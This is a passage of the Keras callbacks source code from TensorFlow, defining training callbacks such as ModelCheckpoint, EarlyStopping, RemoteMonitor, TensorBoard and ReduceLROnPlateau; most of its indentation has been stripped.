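      filepath='weights.{epoch:02d}-{val_loss:.2f}.hdf5',
      monitor='val_loss',
      save_best_only=True)
  model.fit(data, labels, epochs=10, validation_split=0.2,
            callbacks=[checkpoint])
  ```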
"""
def __init__(self,
filepath,
monitor='val_loss',
verbose=0,
save_best_only=False,
save_weights_only=False,
mode='auto',
save_freq='epoch',
load_weights_on_restart=False,
**kwargs):
super(ModelCheckpoint, self).__init__()
self.monitor = monitor
self.verbose = verbose
self.filepath = filepath
self.save_best_only = save_best_only
self.save_weights_only = save_weights_only
self.save_freq = save_freq
self.load_weights_on_restart = load_weights_on_restart
self.epochs_since_last_save = 0
self._samples_seen_since_last_saving = 0
# Deprecated field `period` is for the number of epochs between which
# the model is saved.
if 'period' in kwargs:
self.period = kwargs['period']
logging.warning('`period` argument is deprecated. Please use `save_freq` '
'to specify the frequency in number of samples seen.')
else:
self.period = 1
if mode not in ['auto', 'min', 'max']:
logging.warning('ModelCheckpoint mode %s is unknown, '
'fallback to auto mode.', mode)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
self.best = np.Inf
elif mode == 'max':
self.monitor_op = np.greater
self.best = -np.Inf
else:
if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):
self.monitor_op = np.greater
self.best = -np.Inf
else:
self.monitor_op = np.less
self.best = np.Inf
if self.save_freq != 'epoch' and not isinstance(self.save_freq, int):
raise ValueError('Unrecognized save_freq: {}'.format(self.save_freq))
# Only the chief worker writes model checkpoints, but all workers
# restore checkpoint at on_train_begin().
self._chief_worker_only = False
def set_model(self, model):
self.model = model
# Use name matching rather than `isinstance` to avoid circular dependencies.
if (not self.save_weights_only and
not model._is_graph_network and # pylint: disable=protected-access
model.__class__.__name__ != 'Sequential'):
self.save_weights_only = True
def on_train_begin(self, logs=None):
# TODO(rchao): Replace dc_context reference with
# distributed_training_utils.should_current_worker_load_model() once
# distributed_training_utils.py no longer depends on callbacks.py.
if K.in_multi_worker_mode(
) and not dc_context.get_current_worker_context().experimental_should_init:
# For multi-worker training, it should not restore a model in certain
# worker setting (e.g. non-chief worker in ParameterServerStrategy).
return
filepath_to_load = self._get_most_recently_modified_file_matching_pattern(
self.filepath)
if (self.load_weights_on_restart and filepath_to_load is not None and
os.path.exists(filepath_to_load)):
try:
# `filepath` may contain placeholders such as `{epoch:02d}`, and thus
# it attempts to load the most recently modified file with file name
# matching the pattern.
self.model.load_weights(filepath_to_load)
except (IOError, ValueError) as e:
raise ValueError('Error loading file from {}. Reason: {}'.format(
filepath_to_load, e))
def on_train_end(self, logs=None):
logs = logs or {}
# pylint: disable=protected-access
if self.model._ckpt_saved_epoch is not None:
# Make `_ckpt_saved_epoch` attribute `None` at the end of training as it
# is only used during the training. Currently it is decided not to
# support fault tolerance across multiple `model.fit()` or `model.fit()`
# with other `model` methods.
epoch = self.model._ckpt_saved_epoch
self.model._ckpt_saved_epoch = None
# TODO(rchao): Support all `save_weights_only` and `save_best_only` cases.
# This will be done with the help of a decoupled training state file that
# contains both epoch and model weights.
if self.save_weights_only and not self.save_best_only:
file_handle, filepath = self._get_file_handle_and_path(epoch, logs)
self.model.save_weights(filepath, overwrite=True)
self._maybe_remove_file(file_handle, filepath)
def on_batch_end(self, batch, logs=None):
logs = logs or {}
if isinstance(self.save_freq, int):
self._samples_seen_since_last_saving += logs.get('size', 1)
if self._samples_seen_since_last_saving >= self.save_freq:
self._save_model(epoch=self._current_epoch, logs=logs)
self._samples_seen_since_last_saving = 0
def on_epoch_begin(self, epoch, logs=None):
self._current_epoch = epoch
def on_epoch_end(self, epoch, logs=None):
self.epochs_since_last_save += 1
if self.save_freq == 'epoch':
self._save_model(epoch=epoch, logs=logs)
def _save_model(self, epoch, logs):
"""Saves the model.
Arguments:
epoch: the epoch this iteration is in.
logs: the `logs` dict passed in to `on_batch_end` or `on_epoch_end`.
"""
logs = logs or {}
if isinstance(self.save_freq,
int) or self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
file_handle, filepath = self._get_file_handle_and_path(epoch, logs)
if self.save_best_only:
current = logs.get(self.monitor)
if current is None:
logging.warning('Can save best model only with %s available, '
'skipping.', self.monitor)
else:
if self.monitor_op(current, self.best):
if self.verbose > 0:
print('\nEpoch %05d: %s improved from %0.5f to %0.5f,'
' saving model to %s' % (epoch + 1, self.monitor, self.best,
current, filepath))
self.best = current
if self.save_weights_only:
self.model.save_weights(filepath, overwrite=True)
else:
self.model.save(filepath, overwrite=True)
else:
if self.verbose > 0:
print('\nEpoch %05d: %s did not improve from %0.5f' %
(epoch + 1, self.monitor, self.best))
else:
if self.verbose > 0:
print('\nEpoch %05d: saving model to %s' % (epoch + 1, filepath))
if self.save_weights_only:
if K.in_multi_worker_mode():
# TODO(rchao): Save to an additional training state file for FT,
# instead of adding an attr to weight file. With this we can support
# the cases of all combinations with `save_weights_only`,
# `save_best_only`, and `save_format` parameters.
# pylint: disable=protected-access
self.model._ckpt_saved_epoch = epoch
self.model.save_weights(filepath, overwrite=True)
else:
self.model.save(filepath, overwrite=True)
self._maybe_remove_file(file_handle, filepath)
def _get_file_handle_and_path(self, epoch, logs):
"""Returns the file handle and path."""
# TODO(rchao): Replace dc_context reference with
# distributed_training_utils.should_current_worker_checkpoint() once
# distributed_training_utils.py no longer depends on callbacks.py.
if not K.in_multi_worker_mode() or dc_context.get_current_worker_context(
).should_checkpoint:
return None, self.filepath.format(epoch=epoch + 1, **logs)
else:
# If this is multi-worker training, and this worker should not
# save checkpoint, we replace the filepath with a dummy filepath so
# it writes to a file that will be removed at the end of _save_model()
# call. This is because the SyncOnReadVariable needs to be synced across
# all the workers in order to be read, and all workers need to initiate
# that.
file_handle, temp_file_name = tempfile.mkstemp()
extension = os.path.splitext(self.filepath)[1]
      # os.path.splitext keeps the leading dot in `extension`.
      return file_handle, temp_file_name + extension
def _maybe_remove_file(self, file_handle, filepath):
# Remove the file in multi-worker training where this worker should
# not checkpoint. It is a dummy file previously saved for sync distributed
# training.
if K.in_multi_worker_mode(
) and not dc_context.get_current_worker_context().should_checkpoint:
os.close(file_handle)
os.remove(filepath)
def _get_most_recently_modified_file_matching_pattern(self, pattern):
"""Returns the most recently modified filepath matching pattern.
    Pattern may contain Python formatting placeholders. If
`tf.train.latest_checkpoint()` does not return None, use that; otherwise,
check for most recently modified one that matches the pattern.
In the rare case where there are more than one pattern-matching file having
the same modified time that is most recent among all, return the filepath
that is largest (by `>` operator, lexicographically using the numeric
equivalents). This provides a tie-breaker when multiple files are most
recent. Note that a larger `filepath` can sometimes indicate a later time of
modification (for instance, when epoch/batch is used as formatting option),
but not necessarily (when accuracy or loss is used). The tie-breaker is
    put in the logic as a best effort to return the most recent one, and to
    avoid nondeterministic results.
Modified time of a file is obtained with `os.path.getmtime()`.
This utility function is best demonstrated via an example:
```python
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
    for file_path in file_paths:
      # Write something to each of the files so they exist on disk.
      open(file_path, 'w').close()
self.assertEqual(
_get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
```
Arguments:
      pattern: The file pattern that may optionally contain a Python
        placeholder such as `{epoch:02d}`.
Returns:
The most recently modified file's full filepath matching `pattern`. If
      `pattern` does not contain any placeholder, this returns the filepath
      that exactly matches `pattern`. Returns `None` if no match is found.
"""
dir_name = os.path.dirname(pattern)
base_name = os.path.basename(pattern)
base_name_regex = '^' + re.sub(r'{.*}', r'.*', base_name) + '$'
# If tf.train.latest_checkpoint tells us there exists a latest checkpoint,
# use that as it is more robust than `os.path.getmtime()`.
latest_tf_checkpoint = checkpoint_management.latest_checkpoint(dir_name)
if latest_tf_checkpoint is not None and re.match(
base_name_regex, os.path.basename(latest_tf_checkpoint)):
return latest_tf_checkpoint
latest_mod_time = 0
file_path_with_latest_mod_time = None
n_file_with_latest_mod_time = 0
file_path_with_largest_file_name = None
if os.path.exists(dir_name):
for file_name in os.listdir(dir_name):
# Only consider if `file_name` matches the pattern.
if re.match(base_name_regex, file_name):
file_path = os.path.join(dir_name, file_name)
mod_time = os.path.getmtime(file_path)
if (file_path_with_largest_file_name is None or
file_path > file_path_with_largest_file_name):
file_path_with_largest_file_name = file_path
if mod_time > latest_mod_time:
latest_mod_time = mod_time
file_path_with_latest_mod_time = file_path
# In the case a file with later modified time is found, reset
# the counter for the number of files with latest modified time.
n_file_with_latest_mod_time = 1
elif mod_time == latest_mod_time:
# In the case a file has modified time tied with the most recent,
# increment the counter for the number of files with latest modified
# time by 1.
n_file_with_latest_mod_time += 1
if n_file_with_latest_mod_time == 1:
# Return the sole file that has most recent modified time.
return file_path_with_latest_mod_time
else:
# If there are more than one file having latest modified time, return
# the file path with the largest file name.
return file_path_with_largest_file_name
@keras_export('keras.callbacks.EarlyStopping')
class EarlyStopping(Callback):
"""Stop training when a monitored quantity has stopped improving.
Arguments:
monitor: Quantity to be monitored.
min_delta: Minimum change in the monitored quantity
to qualify as an improvement, i.e. an absolute
      change of less than `min_delta` will count as no
improvement.
patience: Number of epochs with no improvement
after which training will be stopped.
verbose: verbosity mode.
mode: One of `{"auto", "min", "max"}`. In `min` mode,
training will stop when the quantity
monitored has stopped decreasing; in `max`
mode it will stop when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity.
baseline: Baseline value for the monitored quantity.
Training will stop if the model doesn't show improvement over the
baseline.
restore_best_weights: Whether to restore model weights from
the epoch with the best value of the monitored quantity.
If False, the model weights obtained at the last step of
training are used.
Example:
```python
callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=3)
# This callback will stop the training when there is no improvement in
# the validation loss for three consecutive epochs.
model.fit(data, labels, epochs=100, callbacks=[callback],
validation_data=(val_data, val_labels))
```
"""
def __init__(self,
monitor='val_loss',
min_delta=0,
patience=0,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=False):
super(EarlyStopping, self).__init__()
self.monitor = monitor
self.patience = patience
self.verbose = verbose
self.baseline = baseline
self.min_delta = abs(min_delta)
self.wait = 0
self.stopped_epoch = 0
self.restore_best_weights = restore_best_weights
self.best_weights = None
if mode not in ['auto', 'min', 'max']:
logging.warning('EarlyStopping mode %s is unknown, '
'fallback to auto mode.', mode)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
elif mode == 'max':
self.monitor_op = np.greater
else:
if 'acc' in self.monitor:
self.monitor_op = np.greater
else:
self.monitor_op = np.less
if self.monitor_op == np.greater:
self.min_delta *= 1
else:
self.min_delta *= -1
def on_train_begin(self, logs=None):
# Allow instances to be re-used
self.wait = 0
self.stopped_epoch = 0
if self.baseline is not None:
self.best = self.baseline
else:
self.best = np.Inf if self.monitor_op == np.less else -np.Inf
def on_epoch_end(self, epoch, logs=None):
current = self.get_monitor_value(logs)
if current is None:
return
if self.monitor_op(current - self.min_delta, self.best):
self.best = current
self.wait = 0
if self.restore_best_weights:
self.best_weights = self.model.get_weights()
else:
self.wait += 1
if self.wait >= self.patience:
self.stopped_epoch = epoch
self.model.stop_training = True
if self.restore_best_weights:
if self.verbose > 0:
print('Restoring model weights from the end of the best epoch.')
self.model.set_weights(self.best_weights)
def on_train_end(self, logs=None):
if self.stopped_epoch > 0 and self.verbose > 0:
print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))
def get_monitor_value(self, logs):
logs = logs or {}
monitor_value = logs.get(self.monitor)
if monitor_value is None:
logging.warning('Early stopping conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
return monitor_value
@keras_export('keras.callbacks.RemoteMonitor')
class RemoteMonitor(Callback):
"""Callback used to stream events to a server.
Requires the `requests` library.
Events are sent to `root + '/publish/epoch/end/'` by default. Calls are
HTTP POST, with a `data` argument which is a
JSON-encoded dictionary of event data.
If send_as_json is set to True, the content type of the request will be
application/json. Otherwise the serialized JSON will be sent within a form.
Arguments:
root: String; root url of the target server.
path: String; path relative to `root` to which the events will be sent.
field: String; JSON field under which the data will be stored.
The field is used only if the payload is sent within a form
(i.e. send_as_json is set to False).
headers: Dictionary; optional custom HTTP headers.
send_as_json: Boolean; whether the request should be
sent as application/json.
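  Example (a minimal sketch; the server URL is illustrative and `model`,
  `data` and `labels` are assumed to be defined elsewhere):
  ```python
  monitor = tf.keras.callbacks.RemoteMonitor(root='http://localhost:9000')
  model.fit(data, labels, epochs=10, callbacks=[monitor])
  ```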
"""
def __init__(self,
root='http://localhost:9000',
path='/publish/epoch/end/',
field='data',
headers=None,
send_as_json=False):
super(RemoteMonitor, self).__init__()
self.root = root
self.path = path
self.field = field
self.headers = headers
self.send_as_json = send_as_json
def on_epoch_end(self, epoch, logs=None):
if requests is None:
raise ImportError('RemoteMonitor requires the `requests` library.')
logs = logs or {}
send = {}
send['epoch'] = epoch
for k, v in logs.items():
send[k] = v
try:
if self.send_as_json:
requests.post(self.root + self.path, json=send, headers=self.headers)
else:
requests.post(
self.root + self.path, {self.field: json.dumps(send)},
headers=self.headers)
except requests.exceptions.RequestException:
logging.warning('Warning: could not reach RemoteMonitor '
'root server at ' + str(self.root))
@keras_export('keras.callbacks.LearningRateScheduler')
class LearningRateScheduler(Callback):
"""Learning rate scheduler.
Arguments:
schedule: a function that takes an epoch index as input
(integer, indexed from 0) and returns a new
learning rate as output (float).
verbose: int. 0: quiet, 1: update messages.
  Example:
  ```python
# This function keeps the learning rate at 0.001 for the first ten epochs
# and decreases it exponentially after that.
def scheduler(epoch):
if epoch < 10:
return 0.001
else:
return 0.001 * tf.math.exp(0.1 * (10 - epoch))
callback = tf.keras.callbacks.LearningRateScheduler(scheduler)
model.fit(data, labels, epochs=100, callbacks=[callback],
validation_data=(val_data, val_labels))
```
"""
def __init__(self, schedule, verbose=0):
super(LearningRateScheduler, self).__init__()
self.schedule = schedule
self.verbose = verbose
def on_epoch_begin(self, epoch, logs=None):
if not hasattr(self.model.optimizer, 'lr'):
raise ValueError('Optimizer must have a "lr" attribute.')
try: # new API
lr = float(K.get_value(self.model.optimizer.lr))
lr = self.schedule(epoch, lr)
except TypeError: # Support for old API for backward compatibility
lr = self.schedule(epoch)
if not isinstance(lr, (float, np.float32, np.float64)):
raise ValueError('The output of the "schedule" function '
'should be float.')
K.set_value(self.model.optimizer.lr, lr)
if self.verbose > 0:
print('\nEpoch %05d: LearningRateScheduler reducing learning '
'rate to %s.' % (epoch + 1, lr))
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
@keras_export('keras.callbacks.TensorBoard', v1=[])
class TensorBoard(Callback):
# pylint: disable=line-too-long
"""Enable visualizations for TensorBoard.
TensorBoard is a visualization tool provided with TensorFlow.
This callback logs events for TensorBoard, including:
* Metrics summary plots
* Training graph visualization
* Activation histograms
* Sampled profiling
If you have installed TensorFlow with pip, you should be able
to launch TensorBoard from the command line:
```sh
tensorboard --logdir=path_to_your_logs
```
You can find more information about TensorBoard
[here](https://www.tensorflow.org/get_started/summaries_and_tensorboard).
Arguments:
log_dir: the path of the directory where to save the log files to be
parsed by TensorBoard.
histogram_freq: frequency (in epochs) at which to compute activation and
weight histograms for the layers of the model. If set to 0, histograms
won't be computed. Validation data (or split) must be specified for
histogram visualizations.
write_graph: whether to visualize the graph in TensorBoard. The log file
can become quite large when write_graph is set to True.
write_images: whether to write model weights to visualize as image in
TensorBoard.
update_freq: `'batch'` or `'epoch'` or integer. When using `'batch'`,
writes the losses and metrics to TensorBoard after each batch. The same
applies for `'epoch'`. If using an integer, let's say `1000`, the
callback will write the metrics and losses to TensorBoard every 1000
samples. Note that writing too frequently to TensorBoard can slow down
your training.
profile_batch: Profile the batch to sample compute characteristics. By
default, it will profile the second batch. Set profile_batch=0 to
disable profiling. Must run in TensorFlow eager mode.
embeddings_freq: frequency (in epochs) at which embedding layers will
be visualized. If set to 0, embeddings won't be visualized.
embeddings_metadata: a dictionary which maps layer name to a file name in
which metadata for this embedding layer is saved. See the
[details](
https://www.tensorflow.org/how_tos/embedding_viz/#metadata_optional)
      about the metadata file format. If the same metadata file is used for
      all embedding layers, a single string can be passed.
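  Example (a minimal sketch; `model`, `data` and `labels` are assumed to be
  defined elsewhere):
  ```python
  tensorboard = tf.keras.callbacks.TensorBoard(log_dir='./logs')
  model.fit(data, labels, epochs=10, callbacks=[tensorboard])
  ```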
Raises:
ValueError: If histogram_freq is set and no validation data is provided.
"""
# pylint: enable=line-too-long
def __init__(self,
log_dir='logs',
histogram_freq=0,
write_graph=True,
write_images=False,
update_freq='epoch',
profile_batch=2,
embeddings_freq=0,
embeddings_metadata=None,
**kwargs):
super(TensorBoard, self).__init__()
self._validate_kwargs(kwargs)
self.log_dir = log_dir
self.histogram_freq = histogram_freq
self.write_graph = write_graph
self.write_images = write_images
if update_freq == 'batch':
self.update_freq = 1
else:
self.update_freq = update_freq
self.embeddings_freq = embeddings_freq
self.embeddings_metadata = embeddings_metadata
self._samples_seen = 0
self._samples_seen_at_last_write = 0
self._current_batch = 0
self._total_batches_seen = 0
self._total_val_batches_seen = 0
# A collection of file writers currently in use, to be closed when
# training ends for this callback. Writers are keyed by the
# directory name under the root logdir: e.g., "train" or
# "validation".
self._writers = {}
self._train_run_name = 'train'
self._validation_run_name = 'validation'
self._profile_batch = profile_batch
# True when a trace is running.
self._is_tracing = False
# TensorBoard should only write summaries on the chief when in a
# Multi-Worker setting.
self._chief_worker_only = True
def _validate_kwargs(self, kwargs):
"""Handle arguments were supported in V1."""
if kwargs.get('write_grads', False):
logging.warning('`write_grads` will be ignored in TensorFlow 2.0 '
'for the `TensorBoard` Callback.')
if kwargs.get('batch_size', False):
logging.warning('`batch_size` is no longer needed in the '
'`TensorBoard` Callback and will be ignored '
'in TensorFlow 2.0.')
if kwargs.get('embeddings_layer_names', False):
logging.warning('`embeddings_layer_names` is not supported in '
'TensorFlow 2.0. Instead, all `Embedding` layers '
'will be visualized.')
if kwargs.get('embeddings_data', False):
logging.warning('`embeddings_data` is not supported in TensorFlow '
'2.0. Instead, all `Embedding` variables will be '
'visualized.')
unrecognized_kwargs = set(kwargs.keys()) - {
'write_grads', 'embeddings_layer_names', 'embeddings_data', 'batch_size'
}
# Only allow kwargs that were supported in V1.
if unrecognized_kwargs:
raise ValueError('Unrecognized arguments in `TensorBoard` '
'Callback: ' + str(unrecognized_kwargs))
def set_model(self, model):
"""Sets Keras model and writes graph if specified."""
self.model = model
with context.eager_mode():
self._close_writers()
if self.write_graph:
with self._get_writer(self._train_run_name).as_default():
with summary_ops_v2.always_record_summaries():
if not model.run_eagerly:
summary_ops_v2.graph(K.get_graph(), step=0)
summary_writable = (
self.model._is_graph_network or # pylint: disable=protected-access
self.model.__class__.__name__ == 'Sequential') # pylint: disable=protected-access
if summary_writable:
summary_ops_v2.keras_model('keras', self.model, step=0)
if self.embeddings_freq:
self._configure_embeddings()
def _configure_embeddings(self):
"""Configure the Projector for embeddings."""
# TODO(omalleyt): Add integration tests.
from tensorflow.python.keras.layers import embeddings
try:
from tensorboard.plugins import projector
except ImportError:
raise ImportError('Failed to import TensorBoard. Please make sure that '
                        'TensorBoard integration is complete.')
config = projector.ProjectorConfig()
for layer in self.model.layers:
if isinstance(layer, embeddings.Embedding):
embedding = config.embeddings.add()
embedding.tensor_name = layer.embeddings.name
if self.embeddings_metadata is not None:
if isinstance(self.embeddings_metadata, str):
embedding.metadata_path = self.embeddings_metadata
else:
            if layer.name in self.embeddings_metadata:
embedding.metadata_path = self.embeddings_metadata.pop(layer.name)
if self.embeddings_metadata:
raise ValueError('Unrecognized `Embedding` layer names passed to '
'`keras.callbacks.TensorBoard` `embeddings_metadata` '
'argument: ' + str(self.embeddings_metadata.keys()))
class DummyWriter(object):
"""Dummy writer to conform to `Projector` API."""
def __init__(self, logdir):
self.logdir = logdir
def get_logdir(self):
return self.logdir
writer = DummyWriter(self.log_dir)
projector.visualize_embeddings(writer, config)
def _close_writers(self):
"""Close all remaining open file writers owned by this callback.
If there are no such file writers, this is a no-op.
"""
with context.eager_mode():
for writer in six.itervalues(self._writers):
writer.close()
self._writers.clear()
def _get_writer(self, writer_name):
"""Get a summary writer for the given subdirectory under the logdir.
A writer will be created if it does not yet exist.
Arguments:
writer_name: The name of the directory for which to create or
retrieve a writer. Should be either `self._train_run_name` or
`self._validation_run_name`.
Returns:
A `SummaryWriter` object.
"""
if writer_name not in self._writers:
path = os.path.join(self.log_dir, writer_name)
writer = summary_ops_v2.create_file_writer_v2(path)
self._writers[writer_name] = writer
return self._writers[writer_name]
def on_train_begin(self, logs=None):
if self._profile_batch == 1:
summary_ops_v2.trace_on(graph=True, profiler=True)
self._is_tracing = True
def on_batch_end(self, batch, logs=None):
"""Writes scalar summaries for metrics on every training batch.
    Performs profiling when the current batch matches `profile_batch`.
Arguments:
batch: Integer, index of batch within the current epoch.
logs: Dict. Metric results for this batch.
"""
# Don't output batch_size and batch number as TensorBoard summaries
logs = logs or {}
self._samples_seen += logs.get('size', 1)
samples_seen_since = self._samples_seen - self._samples_seen_at_last_write
if self.update_freq != 'epoch' and samples_seen_since >= self.update_freq:
self._log_metrics(logs, prefix='batch_', step=self._total_batches_seen)
self._samples_seen_at_last_write = self._samples_seen
self._total_batches_seen += 1
if self._is_tracing:
self._log_trace()
elif (not self._is_tracing and
self._total_batches_seen == self._profile_batch - 1):
self._enable_trace()
def on_epoch_end(self, epoch, logs=None):
"""Runs metrics and histogram summaries at epoch end."""
step = epoch if self.update_freq == 'epoch' else self._samples_seen
self._log_metrics(logs, prefix='epoch_', step=step)
if self.histogram_freq and epoch % self.histogram_freq == 0:
self._log_weights(epoch)
if self.embeddings_freq and epoch % self.embeddings_freq == 0:
self._log_embeddings(epoch)
def on_train_end(self, logs=None):
if self._is_tracing:
self._log_trace()
self._close_writers()
def _enable_trace(self):
if context.executing_eagerly():
summary_ops_v2.trace_on(graph=True, profiler=True)
self._is_tracing = True
def _log_trace(self):
if context.executing_eagerly():
with self._get_writer(self._train_run_name).as_default(), \
summary_ops_v2.always_record_summaries():
# TODO(b/126388999): Remove step info in the summary name.
summary_ops_v2.trace_export(
name='batch_%d' % self._total_batches_seen,
step=self._total_batches_seen,
profiler_outdir=os.path.join(self.log_dir, 'train'))
self._is_tracing = False
def _log_metrics(self, logs, prefix, step):
"""Writes metrics out as custom scalar summaries.
Arguments:
logs: Dict. Keys are scalar summary names, values are NumPy scalars.
prefix: String. The prefix to apply to the scalar summary names.
step: Int. The global step to use for TensorBoard.
"""
if logs is None:
logs = {}
# Group metrics by the name of their associated file writer. Values
# are lists of metrics, as (name, scalar_value) pairs.
logs_by_writer = {
self._train_run_name: [],
self._validation_run_name: [],
}
validation_prefix = 'val_'
for (name, value) in logs.items():
if name in ('batch', 'size', 'num_steps'):
# Scrub non-metric items.
continue
if name.startswith(validation_prefix):
name = name[len(validation_prefix):]
writer_name = self._validation_run_name
else:
writer_name = self._train_run_name
name = prefix + name # assign batch or epoch prefix
logs_by_writer[writer_name].append((name, value))
with context.eager_mode():
with summary_ops_v2.always_record_summaries():
for writer_name in logs_by_writer:
these_logs = logs_by_writer[writer_name]
if not these_logs:
# Don't create a "validation" events file if we don't
# actually have any validation data.
continue
writer = self._get_writer(writer_name)
with writer.as_default():
for (name, value) in these_logs:
summary_ops_v2.scalar(name, value, step=step)
def _log_weights(self, epoch):
"""Logs the weights of the Model to TensorBoard."""
writer = self._get_writer(self._train_run_name)
with context.eager_mode(), \
writer.as_default(), \
summary_ops_v2.always_record_summaries():
for layer in self.model.layers:
for weight in layer.weights:
weight_name = weight.name.replace(':', '_')
with ops.init_scope():
weight = K.get_value(weight)
summary_ops_v2.histogram(weight_name, weight, step=epoch)
if self.write_images:
self._log_weight_as_image(weight, weight_name, epoch)
writer.flush()
def _log_weight_as_image(self, weight, weight_name, epoch):
"""Logs a weight as a TensorBoard image."""
w_img = array_ops.squeeze(weight)
shape = K.int_shape(w_img)
if len(shape) == 1: # Bias case
w_img = array_ops.reshape(w_img, [1, shape[0], 1, 1])
elif len(shape) == 2: # Dense layer kernel case
if shape[0] > shape[1]:
w_img = array_ops.transpose(w_img)
shape = K.int_shape(w_img)
w_img = array_ops.reshape(w_img, [1, shape[0], shape[1], 1])
elif len(shape) == 3: # ConvNet case
if K.image_data_format() == 'channels_last':
# Switch to channels_first to display every kernel as a separate
# image.
w_img = array_ops.transpose(w_img, perm=[2, 0, 1])
shape = K.int_shape(w_img)
w_img = array_ops.reshape(w_img, [shape[0], shape[1], shape[2], 1])
shape = K.int_shape(w_img)
# Not possible to handle 3D convnets etc.
if len(shape) == 4 and shape[-1] in [1, 3, 4]:
summary_ops_v2.image(weight_name, w_img, step=epoch)
def _log_embeddings(self, epoch):
embeddings_ckpt = os.path.join(self.log_dir, 'train',
'keras_embedding.ckpt-{}'.format(epoch))
self.model.save_weights(embeddings_ckpt)
@keras_export('keras.callbacks.ReduceLROnPlateau')
class ReduceLROnPlateau(Callback):
"""Reduce learning rate when a metric has stopped improving.
Models often benefit from reducing the learning rate by a factor
of 2-10 once learning stagnates. This callback monitors a
quantity and if no improvement is seen for a 'patience' number
of epochs, the learning rate is reduced.
Example:
```python
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,
patience=5, min_lr=0.001)
model.fit(X_train, Y_train, callbacks=[reduce_lr])
```
Arguments:
monitor: quantity to be monitored.
factor: factor by which the learning rate will be reduced. new_lr = lr *
factor
patience: number of epochs with no improvement after which learning rate
will be reduced.
verbose: int. 0: quiet, 1: update messages.
mode: one of {auto, min, max}. In `min` mode, lr will be reduced when the
quantity monitored has stopped decreasing; in `max` mode it will be
reduced when the quantity monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred from the name of the
monitored quantity.
min_delta: threshold for measuring the new optimum, to only focus on
significant changes.
cooldown: number of epochs to wait before resuming normal operation after
lr has been reduced.
min_lr: lower bound on the learning rate.
"""
def __init__(self,
monitor='val_loss',
factor=0.1,
patience=10,
verbose=0,
mode='auto',
min_delta=1e-4,
cooldown=0,
min_lr=0,
**kwargs):
super(ReduceLROnPlateau, self).__init__()
self.monitor = monitor
if factor >= 1.0:
raise ValueError('ReduceLROnPlateau ' 'does not support a factor >= 1.0.')
if 'epsilon' in kwargs:
min_delta = kwargs.pop('epsilon')
logging.warning('`epsilon` argument is deprecated and '
'will be removed, use `min_delta` instead.')
self.factor = factor
self.min_lr = min_lr
self.min_delta = min_delta
self.patience = patience
self.verbose = verbose
self.cooldown = cooldown
self.cooldown_counter = 0 # Cooldown counter.
self.wait = 0
self.best = 0
self.mode = mode
self.monitor_op = None
self._reset()
def _reset(self):
"""Resets wait counter and cooldown counter.
"""
if self.mode not in ['auto', 'min', 'max']:
logging.warning('Learning Rate Plateau Reducing mode %s is unknown, '
'fallback to auto mode.', self.mode)
self.mode = 'auto'
if (self.mode == 'min' or
(self.mode == 'auto' and 'acc' not in self.monitor)):
self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)
self.best = np.Inf
else:
self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)
self.best = -np.Inf
self.cooldown_counter = 0
self.wait = 0
def on_train_begin(self, logs=None):
self._reset()
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
current = logs.get(self.monitor)
if current is None:
logging.warning('Reduce LR on plateau conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
else:
if self.in_cooldown():
self.cooldown_counter -= 1
self.wait = 0
if self.monitor_op(current, self.best):
self.best = current
self.wait = 0
elif not self.in_cooldown():
self.wait += 1
if self.wait >= self.patience:
old_lr = float(K.get_value(self.model.optimizer.lr))
if old_lr > self.min_lr:
new_lr = old_lr * self.factor
new_lr = max(new_lr, self.min_lr)
K.set_value(self.model.optimizer.lr, new_lr)
if self.verbose > 0:
print('\nEpoch %05d: ReduceLROnPlateau reducing learning '
'rate to %s.' % (epoch + 1, new_lr))
self.cooldown_counter = self.cooldown
self.wait = 0
def in_cooldown(self):
return self.cooldown_counter > 0
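  # Worked example (hypothetical numbers, not part of the upstream source):
  # with factor=0.2, patience=5, min_lr=1e-5 and a stalled val_loss, the rate
  # steps 1e-2 -> 2e-3 -> 4e-4 -> 8e-5 -> 1.6e-5 -> 1e-5 (clamped at min_lr),
  # waiting `patience` epochs before each cut and `cooldown` epochs after it.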
@keras_export('keras.callbacks.CSVLogger')
class CSVLogger(Callback):
"""Callback that streams epoch results to a csv file.
Supports all values that can be represented as a string,
including 1D iterables such as np.ndarray.
Example:
```python
csv_logger = CSVLogger('training.log')
model.fit(X_train, Y_train, callbacks=[csv_logger])
```
Arguments:
filename: filename of the csv file, e.g. 'run/log.csv'.
separator: string used to separate elements in the csv file.
append: True: append if file exists (useful for continuing
          training). False: overwrite existing file.
"""
def __init__(self, filename, separator=',', append=False):
self.sep = separator
self.filename = filename
self.append = append
self.writer = None
self.keys = None
self.append_header = True
if six.PY2:
self.file_flags = 'b'
self._open_args = {}
else:
self.file_flags = ''
self._open_args = {'newline': '\n'}
super(CSVLogger, self).__init__()
def on_train_begin(self, logs=None):
if self.append:
if os.path.exists(self.filename):
with open(self.filename, 'r' + self.file_flags) as f:
self.append_header = not bool(len(f.readline()))
mode = 'a'
else:
mode = 'w'
self.csv_file = io.open(self.filename,
mode + self.file_flags,
**self._open_args)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
def handle_value(k):
is_zero_dim_ndarray = isinstance(k, np.ndarray) and k.ndim == 0
if isinstance(k, six.string_types):
return k
